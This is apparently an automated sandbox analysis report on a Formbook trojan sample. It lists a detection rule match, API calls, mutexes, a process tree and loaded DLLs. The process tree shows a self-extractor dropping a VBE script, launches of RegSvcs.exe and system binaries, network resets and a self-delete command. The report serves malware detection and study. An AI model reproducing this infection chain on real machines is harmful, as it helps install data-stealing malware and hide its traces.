              Source: Process Memory Space: cmmon32.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1671/57@6/0
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A2932C GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_00A2932C
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059194F AdjustTokenPrivileges,CloseHandle,8_2_0059194F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00591F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_00591F53
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,8_2_005A5B27
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059DC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,8_2_0059DC9C
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005B4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,8_2_005B4089
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A3EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00A3EBD3
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCommand line argument: sfxname0_2_00A4454A
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCommand line argument: sfxstime0_2_00A4454A
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCommand line argument: STARTDLG0_2_00A4454A
              Source: M1Y6kc9FpE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: M1Y6kc9FpE.exeReversingLabs: Detection: 79%
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeFile read: C:\Users\user\Desktop\M1Y6kc9FpE.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\M1Y6kc9FpE.exe "C:\Users\user\Desktop\M1Y6kc9FpE.exe"
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docx
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc oxhvi.msc bvqmcwxut.docx
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docxJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc oxhvi.msc bvqmcwxut.docxJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOCJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOCJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOCJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: cmutil.dll
              Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: cmutil.dll
              Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: windows.storage.dll
